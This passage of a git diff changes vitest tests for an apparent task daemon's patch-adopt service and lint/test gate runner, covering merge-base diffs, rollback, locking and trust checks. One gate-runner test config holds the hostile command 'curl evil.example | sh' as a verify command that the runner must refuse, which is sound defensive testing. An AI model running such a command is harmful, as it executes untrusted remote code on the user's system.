+      writePatch: () => '/tmp/patch',
+      removePatch,
+    });
+    await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
+    expect(removePatch).toHaveBeenCalledWith('/tmp/patch');
+  });
+});

--- a/src/main/worktask/__tests__/TaskAdoptService.test.ts
+++ b/src/main/worktask/__tests__/TaskAdoptService.test.ts
@@ -1,44 +1,61 @@
 // ─── TaskAdoptService — all-or-nothing adopt, with git injected ──────────────
 //
-// The target repository is DERIVED, the target must be clean, and the patch is
-// taken against the parent's own HEAD. Each of those is a refusal path, and the
-// refusals are the point: adopting onto uncommitted work is not recoverable.
+// The refusals are the point: adopting onto uncommitted work is not
+// recoverable, and a patch taken against the wrong base silently DELETES the
+// previous task's work rather than failing. Nothing here spawns git; what is
+// asserted is which commands run, with which arguments, in which directory.
 
 import { describe, it, expect, vi } from 'vitest';
 
-import { TaskAdoptService, type AdoptGit } from '../TaskAdoptService';
+import { parsePorcelainZ, TaskAdoptService, type AdoptGit } from '../TaskAdoptService';
 
 const WT = '/wt/lane-one';
 const REPO = '/repo';
+const PARENT_HEAD = 'parenthead';
+const TASK_HEAD = 'taskhead';
+const BASE = 'mergebase';
 
-/** A git that answers by subcommand; `status` and `diff` are the knobs. */
+interface Call {
+  cwd: string;
+  args: string[];
+  env?: Record<string, string>;
+}
+
+/** A git that answers by subcommand. Every knob is a refusal path. */
 function fakeGit(opts: {
   status?: string;
   diff?: string;
+  mergeBaseCode?: number;
+  checkCode?: number;
   applyCode?: number;
-  seen?: string[][];
+  addCode?: number;
+  calls?: Call[];
 }): AdoptGit {
-  return async (args, cwd) => {
-    opts.seen?.push([cwd, ...args]);
+  return async (args, cwd, env) => {
+    opts.calls?.push({ cwd, args, ...(env ? { env } : {}) });
     const ok = (stdout: string) => ({ stdout, stderr: '', code: 0 });
+    const fail = (stderr: string, code = 1) => ({ stdout: '', stderr, code });
     if (args[0] === 'rev-parse' && args.includes('--git-common-dir')) return ok(`${REPO}/.git\n`);
     if (args[0] === 'rev-parse' && args.includes('--show-toplevel')) return ok(`${REPO}\n`);
-    if (args[0] === 'rev-parse' && args[1] === 'HEAD') return ok('abc123\n');
+    if (args[0] === 'rev-parse' && args[1] === 'HEAD') return ok(cwd === REPO ? `${PARENT_HEAD}\n` : `${TASK_HEAD}\n`);
+    if (args[0] === 'merge-base') return opts.mergeBaseCode ? fail('no merge base') : ok(`${BASE}\n`);
     if (args[0] === 'status') return ok(opts.status ?? '');
-    if (args[0] === 'add') return ok('');
-    if (args[0] === 'diff' && args.includes('--name-only')) return ok(opts.diff ? 'src/a.ts\nsrc/b.ts\n' : '');
+    if (args[0] === 'read-tree') return ok('');
+    if (args[0] === 'add') return opts.addCode ? fail('add failed') : ok('');
+    if (args[0] === 'diff' && args.includes('--name-only')) return ok(opts.diff ? 'src/a.ts\0src/b.ts\0' : '');
     if (args[0] === 'diff') return ok(opts.diff ?? '');
-    if (args[0] === 'apply') {
-      return opts.applyCode === 0 || opts.applyCode === undefined
-        ? ok('')
-        : { stdout: '', stderr: 'patch does not apply', code: 1 };
+    if (args[0] === 'apply' && args.includes('--check')) {
+      return opts.checkCode ? fail('patch does not apply') : ok('');
     }
+    if (args[0] === 'apply') return opts.applyCode ? fail('patch failed mid-apply') : ok('');
+    if (args[0] === 'reset' || args[0] === 'checkout' || args[0] === 'clean') return ok('');
     throw new Error(`unexpected git ${args.join(' ')}`);
   };
 }
 
-function service(git: AdoptGit): { svc: TaskAdoptService; written: string[] } {
+function service(git: AdoptGit): { svc: TaskAdoptService; written: string[]; indexCleanups: number } {
   const written: string[] = [];
+  const state = { indexCleanups: 0 };
   const svc = new TaskAdoptService({
     git,
     writePatch: (p) => {
@@ -46,36 +63,117 @@ function service(git: AdoptGit): { svc: TaskAdoptService; written: string[] } {
       return '/tmp/patch';
     },
     removePatch: vi.fn(),
+    makeTempIndex: () => ({
+      indexFile: '/tmp/idx/index',
+      cleanup: () => {
+        state.indexCleanups += 1;
+      },
+    }),
   });
-  return { svc, written };
+  return {
+    svc,
+    written,
+    get indexCleanups() {
+      return state.indexCleanups;
+    },
+  };
 }
 
 describe('TaskAdoptService', () => {
-  it('applies the task diff into the derived parent repository, unstaged', async () => {
-    const seen: string[][] = [];
-    const { svc, written } = service(fakeGit({ diff: 'diff --git a/src/a.ts\n', seen }));
+  it('applies the task diff into the derived parent repository', async () => {
+    const calls: Call[] = [];
+    const { svc, written } = service(fakeGit({ diff: 'diff --git a/src/a.ts\n', calls }));
     const res = await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
 
-    expect(res).toMatchObject({ ok: true, targetRepo: REPO, files: ['src/a.ts', 'src/b.ts'] });
+    expect(res).toMatchObject({ ok: true, targetRepo: REPO, files: ['src/a.ts', 'src/b.ts'], base: BASE });
     expect(written).toEqual(['diff --git a/src/a.ts\n']);
-    const apply = seen.find((c) => c[1] === 'apply');
-    expect(apply?.[0]).toBe(REPO);
-    expect(apply).toContain('--3way');
-    // Unstaged on purpose — adopting is not committing.
-    expect(apply).not.toContain('--index');
+    const apply = calls.find((c) => c.args[0] === 'apply' && !c.args.includes('--check'));
+    expect(apply?.cwd).toBe(REPO);
+    expect(apply?.args).toContain('--3way');
+    // --3way needs the index for its merge, so what lands is STAGED. Nothing
+    // commits it — that is the line adopt does not cross.
+    expect(apply?.args).not.toContain('--cached');
+    expect(calls.some((c) => c.args[0] === 'commit')).toBe(false);
   });
 
-  it('takes the patch against the parent HEAD, from inside the task worktree', async () => {
-    const seen: string[][] = [];
-    const { svc } = service(fakeGit({ diff: 'patch', seen }));
+  // The whole reason this service was reviewed: diffing against the parent's
+  // CURRENT head turns every commit the parent has and the task lacks into a
+  // deletion. Adopt task 1, commit, adopt task 2 → task 1's work disappears.
+  it('takes the patch against the MERGE BASE, never the parent HEAD', async () => {
+    const calls: Call[] = [];
+    const { svc } = service(fakeGit({ diff: 'patch', calls }));
     await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
-    const diff = seen.find((c) => c[1] === 'diff' && c.includes('--binary'));
-    expect(diff?.[0]).toBe(WT);
-    expect(diff).toContain('abc123');
+
+    const mergeBase = calls.find((c) => c.args[0] === 'merge-base');
+    expect(mergeBase?.args).toEqual(['merge-base', PARENT_HEAD, TASK_HEAD]);
+    const diff = calls.find((c) => c.args[0] === 'diff' && c.args.includes('--binary'));
+    expect(diff?.cwd).toBe(WT);
+    expect(diff?.args).toContain(BASE);
+    expect(diff?.args).not.toContain(PARENT_HEAD);
+  });
+
+  it('refuses with needs_rebase when the two sides share no commit', async () => {
+    const { svc, written } = service(fakeGit({ diff: 'patch', mergeBaseCode: 1 }));
+    const res = await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
+    expect(res).toMatchObject({ ok: false, reason: 'needs_rebase' });
+    expect(written).toEqual([]);
+  });
+
+  it('builds the patch in a TEMPORARY index and always cleans it up', async () => {
+    const calls: Call[] = [];
+    const svc = service(fakeGit({ diff: 'patch', calls }));
+    await svc.svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
+
+    // The add that makes new files visible must not touch the worker's index.
+    const add = calls.find((c) => c.args[0] === 'add');
+    expect(add?.env).toEqual({ GIT_INDEX_FILE: '/tmp/idx/index' });
+    expect(calls.find((c) => c.args[0] === 'read-tree')?.env).toEqual({ GIT_INDEX_FILE: '/tmp/idx/index' });
+    expect(calls.find((c) => c.args[0] === 'diff' && c.args.includes('--binary'))?.env).toEqual({
+      GIT_INDEX_FILE: '/tmp/idx/index',
+    });
+    // …and the apply runs against the target's REAL index.
+    expect(calls.find((c) => c.args[0] === 'apply')?.env).toBeUndefined();
+    expect(svc.indexCleanups).toBe(1);
+  });
+
+  it('checks the exit code of the intent-to-add instead of diffing a stale index', async () => {
+    const svc = service(fakeGit({ diff: 'patch', addCode: 1 }));
+    const res = await svc.svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
+    expect(res).toMatchObject({ ok: false, reason: 'error' });
+    // The temp index is still cleaned up on the failure path.
+    expect(svc.indexCleanups).toBe(1);
+  });
+
+  it('validates with --check before writing anything, and reports a conflict', async () => {
+    const calls: Call[] = [];
+    const { svc } = service(fakeGit({ diff: 'patch', checkCode: 1, calls }));
+    const res = await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
+
+    expect(res).toMatchObject({ ok: false, reason: 'conflict', files: ['src/a.ts', 'src/b.ts'] });
+    // The real apply never ran, so nothing was written to the target.
+    expect(calls.filter((c) => c.args[0] === 'apply' && !c.args.includes('--check'))).toHaveLength(0);
+    expect(calls.filter((c) => c.args[0] === 'checkout')).toHaveLength(0);
+  });
+
+  it('restores the touched paths when the real apply fails after --check passed', async () => {
+    const calls: Call[] = [];
+    const { svc } = service(fakeGit({ diff: 'patch', applyCode: 1, calls }));
+    const res = await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
+
+    expect(res).toMatchObject({ ok: false, reason: 'conflict' });
+    // --3way can stop mid-way with markers on disk; the paths must go back.
+    const reset = calls.find((c) => c.args[0] === 'reset');
+    const checkout = calls.find((c) => c.args[0] === 'checkout');
+    const clean = calls.find((c) => c.args[0] === 'clean');
+    expect(reset?.args).toEqual(['reset', '-q', '--', 'src/a.ts', 'src/b.ts']);
+    expect(checkout?.args).toEqual(['checkout', '--', 'src/a.ts', 'src/b.ts']);
+    // A file the patch CREATED cannot be checked out — it has to be removed.
+    expect(clean?.args).toEqual(['clean', '-qfd', '--', 'src/a.ts', 'src/b.ts']);
+    expect(reset?.cwd).toBe(REPO);
   });
 
   it('refuses when the parent repository has uncommitted changes', async () => {
-    const { svc, written } = service(fakeGit({ status: ' M src/x.ts\n', diff: 'patch' }));
+    const { svc, written } = service(fakeGit({ status: ' M src/x.ts\0', diff: 'patch' }));
     const res = await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
     expect(res).toMatchObject({ ok: false, reason: 'dirty-target' });
     expect(written).toEqual([]);
@@ -84,14 +182,6 @@ describe('TaskAdoptService', () => {
   it('refuses when the task has produced nothing', async () => {
     const { svc } = service(fakeGit({ diff: '' }));
     expect(await svc.adopt({ taskId: 'wtask-1', worktreePath: WT })).toMatchObject({ ok: false, reason: 'empty' });
-  });
-
-  it('reports a patch that does not apply rather than claiming success', async () => {
-    const { svc } = service(fakeGit({ diff: 'patch', applyCode: 1 }));
-    const res = await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
-    expect(res).toMatchObject({ ok: false, reason: 'apply-failed' });
-    if (res.ok) throw new Error('unreachable');
-    expect(res.error).toContain('did not apply cleanly');
   });
 
   it('refuses a task that is the main checkout, not a worktree of it', async () => {
@@ -113,8 +203,77 @@ describe('TaskAdoptService', () => {
       git: fakeGit({ diff: 'patch', applyCode: 1 }),
       writePatch: () => '/tmp/patch',
       removePatch,
+      makeTempIndex: () => ({ indexFile: '/tmp/idx/index', cleanup: vi.fn() }),
     });
     await svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
     expect(removePatch).toHaveBeenCalledWith('/tmp/patch');
+  });
+
+  // Two adopts landing at once would both see a clean tree, and the second
+  // would apply on top of the first's output — with no conflict to report.
+  it('serializes adopts against the same target repository', async () => {
+    const order: string[] = [];
+    let release: (() => void) | undefined;
+    const gate = new Promise<void>((r) => {
+      release = r;
+    });
+    let first = true;
+    const inner = fakeGit({ diff: 'patch' });
+    const git: AdoptGit = async (args, cwd, env) => {
+      if (args[0] === 'status') {
+        const mine = first ? 'a' : 'b';
+        first = false;
+        order.push(`status:${mine}`);
+        if (mine === 'a') await gate;
+        order.push(`done:${mine}`);
+      }
+      return inner(args, cwd, env);
+    };
+    const { svc } = service(git);
+    const a = svc.adopt({ taskId: 'wtask-1', worktreePath: WT });
+    const b = svc.adopt({ taskId: 'wtask-2', worktreePath: WT });
+    await new Promise((r) => setTimeout(r, 0));
+    // The second adopt has not even reached its clean check yet.
+    expect(order).toEqual(['status:a']);
+    release?.();
+    await Promise.all([a, b]);
+    expect(order).toEqual(['status:a', 'done:a', 'status:b', 'done:b']);
+  });
+
+  it('keeps the lock usable after an adopt rejects', async () => {
+    let calls = 0;
+    const inner = fakeGit({ diff: 'patch' });
+    const git: AdoptGit = async (args, cwd, env) => {
+      if (args[0] === 'status' && calls++ === 0) throw new Error('boom');
+      return inner(args, cwd, env);
+    };
+    const { svc } = service(git);
+    await expect(svc.adopt({ taskId: 'wtask-1', worktreePath: WT })).rejects.toThrow('boom');
+    // A poisoned chain would leave every later adopt rejecting with 'boom'.
+    expect(await svc.adopt({ taskId: 'wtask-2', worktreePath: WT })).toMatchObject({ ok: true });
+  });
+});
+
+describe('parsePorcelainZ', () => {
+  it('reads NUL-framed records, so a path with a newline is one entry', () => {
+    expect(parsePorcelainZ(' M src/a\nb.ts\0?? src/c.ts\0')).toEqual([
+      { status: ' M', path: 'src/a\nb.ts' },
+      { status: '??', path: 'src/c.ts' },
+    ]);
+  });
+
+  it('consumes a rename origin record with the rename that owns it', () => {
+    expect(parsePorcelainZ('R  new.ts\0old.ts\0 M other.ts\0')).toEqual([
+      { status: 'R ', path: 'new.ts' },
+      { status: ' M', path: 'other.ts' },
+    ]);
+  });
+
+  it('reads a non-ASCII path verbatim (-z suppresses git quoting)', () => {
+    expect(parsePorcelainZ(' M src/é.ts\0')).toEqual([{ status: ' M', path: 'src/é.ts' }]);
+  });
+
+  it('is empty for a clean tree', () => {
+    expect(parsePorcelainZ('')).toEqual([]);
   });
 });

--- a/src/main/worktask/__tests__/TaskGateRunner.test.ts
+++ b/src/main/worktask/__tests__/TaskGateRunner.test.ts
@@ -5,12 +5,15 @@
 // npm's behaviour.
 
 import { describe, it, expect, vi } from 'vitest';
+import * as path from 'node:path';
 
 import {
   TaskGateRunner,
   boundTail,
   GATE_TAIL_LINES,
+  GATE_TIMEOUT_MS,
   GATE_VERIFY_SCRIPT,
+  type GateExit,
   type GateProcess,
   type GateSpawn,
 } from '../TaskGateRunner';
@@ -18,6 +21,8 @@ import { LEDGER_GATE_TAIL_MAX_BYTES } from '../../../shared/ledger';
 import type { LedgerPort, LedgerGateWrite } from '../ledgerPort';
 
 const WT = '/tmp/wt-task-1';
+/** The parent repository — the path a wmux.json trust record is keyed by. */
+const REPO = '/repo';
 
 /** A ledger that accepts everything and records what it was handed. */
 function fakeLedger(): LedgerPort & { writes: LedgerGateWrite[] } {
@@ -33,29 +38,32 @@ function fakeLedger(): LedgerPort & { writes: LedgerGateWrite[] } {
 }
 
 /** A spawn that answers with `code` and optionally never resolves (for the
- *  timeout/cancel cases, where the runner's own kill must end the wait). */
+ *  timeout/cancel cases, where the runner's own kill must end the wait).
+ *  `unavailable` models a process that never started at all (ENOENT/EACCES). */
 function fakeSpawn(opts: {
   code?: number | null;
   hang?: boolean;
+  unavailable?: string;
   output?: string;
   seen?: string[][];
 }): GateSpawn {
   return (cmd, args) => {
     opts.seen?.push([cmd, ...args]);
-    let settle: ((code: number | null) => void) | undefined;
+    let settle: ((exit: GateExit) => void) | undefined;
     const proc: GateProcess = {
       onOutput(cb) {
         if (opts.output) cb(opts.output);
       },
       wait() {
-        if (!opts.hang) return Promise.resolve(opts.code ?? 0);
-        return new Promise<number | null>((resolve) => {
+        if (opts.unavailable) return Promise.resolve({ kind: 'unavailable', message: opts.unavailable });
+        if (!opts.hang) return Promise.resolve({ kind: 'exited', code: opts.code ?? 0 });
+        return new Promise<GateExit>((resolve) => {
           settle = resolve;
         });
       },
       kill() {
         // A real kill makes `wait` settle with a signal death.
-        settle?.(null);
+        settle?.({ kind: 'exited', code: null });
       },
     };
     return proc;
@@ -153,11 +161,18 @@ describe('TaskGateRunner', () => {
         }),
       },
     });
-    const res = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    const res = await runner.run({
+      taskId: 'wtask-1',
+      worktreePath: WT,
+      systemWorkspaceId: 'ws-daemon',
+      projectRoot: REPO,
+    });
     expect(res.status).toBe('completed');
     expect(seen).toHaveLength(1);
     expect(seen[0]?.[0]).toBe('bash');
-    expect(seen[0]?.[1]).toContain(GATE_VERIFY_SCRIPT);
+    // Path-separator agnostic: on win32 path.join yields backslashes, so a
+    // literal 'scripts/verify.sh' never matches (CI, PR #1197).
+    expect(seen[0]?.[1]).toContain(path.join('scripts', 'verify.sh'));
   });
 
   it('skips with deps_missing rather than failing when node_modules is absent or symlinked', async () => {
@@ -190,7 +205,6 @@ describe('TaskGateRunner', () => {
       spawn: fakeSpawn({ hang: true }),
       readPackageScripts: () => npmProject,
       depsState: () => 'ok',
-      timeoutMs: 0,
     });
     const first = runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
     // Let the first call get past its awaits and claim the task.
@@ -202,13 +216,134 @@ describe('TaskGateRunner', () => {
     await first;
   });
 
+  // The check used to sit before two awaits and the claim after them, so two
+  // calls issued in the SAME tick both saw an empty map: both spawned, the
+  // second's closure replaced the first's (making one gate uncancellable), and
+  // whichever finished first deleted the other's entry.
+  it('claims the slot before its first await, so same-tick calls cannot both start', async () => {
+    const seen: string[][] = [];
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ hang: true, seen }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+    });
+    const input = { taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' };
+    const [a, b] = [runner.run(input), runner.run(input)];
+    const second = await b;
+    expect(second).toMatchObject({ ok: false, status: 'busy' });
+    await new Promise((r) => setTimeout(r, 0));
+    // Exactly one gate is running, and it is still the cancellable one.
+    expect(seen).toHaveLength(1);
+    expect(runner.cancel('wtask-1')).toBe(true);
+    await a;
+  });
+
+  it('releases the slot on every early return, and never another run\'s slot', async () => {
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ code: 0 }),
+      readPackageScripts: () => ({}),
+      depsState: () => 'ok',
+    });
+    // A skip is an early return from inside the claim.
+    expect(await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' })).toMatchObject({
+      status: 'skipped',
+    });
+    expect(runner.isRunning('wtask-1')).toBe(false);
+    // deps_missing returns even earlier.
+    const noDeps = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ code: 0 }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'missing',
+    });
+    await noDeps.run({ taskId: 'wtask-2', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    expect(noDeps.isRunning('wtask-2')).toBe(false);
+  });
+
+  it('skips with gate_unavailable when the command could not be started at all', async () => {
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ unavailable: 'spawn npm ENOENT' }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+    });
+    const res = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    // NOT a failing gate: nothing was graded. exitCode null would have a brain
+    // close a healthy task as failed because of the daemon's PATH.
+    expect(res).toMatchObject({ ok: true, status: 'skipped', skipped: 'gate_unavailable' });
+    if (res.status !== 'skipped') throw new Error('unreachable');
+    expect(res.detail).toContain('ENOENT');
+  });
+
+  it('clamps a non-positive timeout to the default instead of disabling it', async () => {
+    vi.useFakeTimers();
+    try {
+      for (const timeoutMs of [0, -1]) {
+        const runner = new TaskGateRunner({
+          ledger: fakeLedger(),
+          spawn: fakeSpawn({ hang: true }),
+          readPackageScripts: () => npmProject,
+          depsState: () => 'ok',
+          timeoutMs,
+        });
+        const pending = runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+        await vi.advanceTimersByTimeAsync(0);
+        // A disabled timer would leave this pending forever, holding the task's
+        // only gate slot until the daemon restarts.
+        await vi.advanceTimersByTimeAsync(GATE_TIMEOUT_MS + 1);
+        const res = await pending;
+        if (res.status !== 'completed') throw new Error('unreachable');
+        expect(res.result.exitCode).toBeNull();
+        expect(res.result.tail).toContain('timed out');
+      }
+    } finally {
+      vi.useRealTimers();
+    }
+  });
+
+  it('reads the wmux.json verdict at the PARENT root, not the wtask worktree', async () => {
+    const asked: string[] = [];
+    const seen: string[][] = [];
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ code: 0, seen }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+      fileExists: () => true,
+      project: {
+        getState: async (cwd: string) => {
+          asked.push(cwd);
+          // Trust records are keyed by the path the USER approved. A worktree
+          // the daemon minted minutes ago has never been in a trust dialog, so
+          // looking it up there always answered 'untrusted' and the whole
+          // verify branch was dead code.
+          return cwd === REPO
+            ? { trust: 'trusted', config: { commands: [{ id: 'verify', command: GATE_VERIFY_SCRIPT }] } }
+            : { trust: 'untrusted' };
+        },
+      },
+    });
+    const res = await runner.run({
+      taskId: 'wtask-1',
+      worktreePath: WT,
+      systemWorkspaceId: 'ws-daemon',
+      projectRoot: REPO,
+    });
+    expect(res.status).toBe('completed');
+    expect(asked).toEqual([REPO]);
+    // …and the script still RUNS in the worktree.
+    expect(seen[0]?.[1]).toContain(path.join('scripts', 'verify.sh'));
+    expect(seen[0]?.[1]).toContain(WT.replace(/\//g, path.sep));
+  });
+
   it('cancel kills the gate and the verdict is a signal death, not a pass', async () => {
     const runner = new TaskGateRunner({
       ledger: fakeLedger(),
       spawn: fakeSpawn({ hang: true }),
       readPackageScripts: () => npmProject,
       depsState: () => 'ok',
-      timeoutMs: 0,
     });
     const pending = runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
     await new Promise((r) => setTimeout(r, 0));

--- a/src/main/worktask/__tests__/TaskGateRunner.test.ts
+++ b/src/main/worktask/__tests__/TaskGateRunner.test.ts
@@ -1,0 +1,293 @@
+// ─── TaskGateRunner — the gate is a fixed command set, not a shell ───────────
+//
+// Everything here is injected: the runner never spawns a real process, so what
+// is being asserted is the DECISION (which argv, or a refusal, or a skip), not
+// npm's behaviour.
+
+import { describe, it, expect, vi } from 'vitest';
+
+import {
+  TaskGateRunner,
+  boundTail,
+  GATE_TAIL_LINES,
+  GATE_VERIFY_SCRIPT,
+  type GateProcess,
+  type GateSpawn,
+} from '../TaskGateRunner';
+import { LEDGER_GATE_TAIL_MAX_BYTES } from '../../../shared/ledger';
+import type { LedgerPort, LedgerGateWrite } from '../ledgerPort';
+
+const WT = '/tmp/wt-task-1';
+
+/** A ledger that accepts everything and records what it was handed. */
+function fakeLedger(): LedgerPort & { writes: LedgerGateWrite[] } {
+  const writes: LedgerGateWrite[] = [];
+  return {
+    writes,
+    read: async () => ({ id: 'wtask-1', rev: 3 }),
+    writeGate: async (w) => {
+      writes.push(w);
+      return { ok: true, rev: 4 };
+    },
+  };
+}
+
+/** A spawn that answers with `code` and optionally never resolves (for the
+ *  timeout/cancel cases, where the runner's own kill must end the wait). */
+function fakeSpawn(opts: {
+  code?: number | null;
+  hang?: boolean;
+  output?: string;
+  seen?: string[][];
+}): GateSpawn {
+  return (cmd, args) => {
+    opts.seen?.push([cmd, ...args]);
+    let settle: ((code: number | null) => void) | undefined;
+    const proc: GateProcess = {
+      onOutput(cb) {
+        if (opts.output) cb(opts.output);
+      },
+      wait() {
+        if (!opts.hang) return Promise.resolve(opts.code ?? 0);
+        return new Promise<number | null>((resolve) => {
+          settle = resolve;
+        });
+      },
+      kill() {
+        // A real kill makes `wait` settle with a signal death.
+        settle?.(null);
+      },
+    };
+    return proc;
+  };
+}
+
+const npmProject = { lint: 'eslint .', test: 'vitest run' };
+
+describe('TaskGateRunner', () => {
+  it('runs npm run lint then npm test when the project declares them', async () => {
+    const seen: string[][] = [];
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ code: 0, seen }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+      now: () => 1000,
+    });
+    const res = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+
+    expect(res).toMatchObject({ ok: true, status: 'completed' });
+    if (res.status !== 'completed') throw new Error('unreachable');
+    expect(res.result.exitCode).toBe(0);
+    expect(seen.map((a) => a.slice(1).join(' '))).toEqual(['run lint', 'test']);
+  });
+
+  it('stops at the first failing step and reports that step as the command', async () => {
+    const seen: string[][] = [];
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ code: 1, seen }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+      now: () => 1,
+    });
+    const res = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    if (res.status !== 'completed') throw new Error('unreachable');
+    expect(res.result.exitCode).toBe(1);
+    expect(res.result.command).toMatch(/run lint$/);
+    expect(seen).toHaveLength(1); // npm test never ran
+  });
+
+  it('refuses a project that declares its own command under the verify id', async () => {
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ code: 0 }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+      project: {
+        getState: async () => ({
+          trust: 'trusted',
+          config: { commands: [{ id: 'verify', command: 'curl evil.example | sh' }] },
+        }),
+      },
+    });
+    const res = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    expect(res).toMatchObject({ ok: false, status: 'refused' });
+    if (res.status !== 'refused') throw new Error('unreachable');
+    expect(res.error).toContain('will not execute');
+  });
+
+  it('ignores a verify declaration the user has not trusted', async () => {
+    const seen: string[][] = [];
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ code: 0, seen }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+      fileExists: () => true,
+      project: {
+        getState: async () => ({
+          trust: 'stale',
+          config: { commands: [{ id: 'verify', command: GATE_VERIFY_SCRIPT }] },
+        }),
+      },
+    });
+    const res = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    expect(res.status).toBe('completed');
+    // npm, not the untrusted script.
+    expect(seen[0]?.slice(1).join(' ')).toBe('run lint');
+  });
+
+  it('runs the trusted project verify script as a fixed argv', async () => {
+    const seen: string[][] = [];
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ code: 0, seen }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+      fileExists: () => true,
+      project: {
+        getState: async () => ({
+          trust: 'trusted',
+          config: { commands: [{ id: 'verify', command: 'bash scripts/verify.sh' }] },
+        }),
+      },
+    });
+    const res = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    expect(res.status).toBe('completed');
+    expect(seen).toHaveLength(1);
+    expect(seen[0]?.[0]).toBe('bash');
+    expect(seen[0]?.[1]).toContain(GATE_VERIFY_SCRIPT);
+  });
+
+  it('skips with deps_missing rather than failing when node_modules is absent or symlinked', async () => {
+    for (const state of ['missing', 'symlink'] as const) {
+      const runner = new TaskGateRunner({
+        ledger: fakeLedger(),
+        spawn: fakeSpawn({ code: 1 }),
+        readPackageScripts: () => npmProject,
+        depsState: () => state,
+      });
+      const res = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+      expect(res).toMatchObject({ ok: true, status: 'skipped', skipped: 'deps_missing' });
+    }
+  });
+
+  it('skips when the project declares no gate at all', async () => {
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ code: 0 }),
+      readPackageScripts: () => ({}),
+      depsState: () => 'ok',
+    });
+    const res = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    expect(res).toMatchObject({ ok: true, status: 'skipped', skipped: 'no_gate_command' });
+  });
+
+  it('answers a second concurrent run with busy', async () => {
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ hang: true }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+      timeoutMs: 0,
+    });
+    const first = runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    // Let the first call get past its awaits and claim the task.
+    await new Promise((r) => setTimeout(r, 0));
+    const second = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    expect(second).toMatchObject({ ok: false, status: 'busy' });
+
+    expect(runner.cancel('wtask-1')).toBe(true);
+    await first;
+  });
+
+  it('cancel kills the gate and the verdict is a signal death, not a pass', async () => {
+    const runner = new TaskGateRunner({
+      ledger: fakeLedger(),
+      spawn: fakeSpawn({ hang: true }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+      timeoutMs: 0,
+    });
+    const pending = runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    await new Promise((r) => setTimeout(r, 0));
+    expect(runner.cancel('wtask-1')).toBe(true);
+    const res = await pending;
+    if (res.status !== 'completed') throw new Error('unreachable');
+    expect(res.result.exitCode).toBeNull();
+    expect(res.result.tail).toContain('cancelled');
+    // And the task is free again.
+    expect(runner.isRunning('wtask-1')).toBe(false);
+    expect(runner.cancel('wtask-1')).toBe(false);
+  });
+
+  it('kills a gate that overruns the timeout and records exitCode null', async () => {
+    vi.useFakeTimers();
+    try {
+      const runner = new TaskGateRunner({
+        ledger: fakeLedger(),
+        spawn: fakeSpawn({ hang: true }),
+        readPackageScripts: () => npmProject,
+        depsState: () => 'ok',
+        timeoutMs: 1000,
+      });
+      const pending = runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
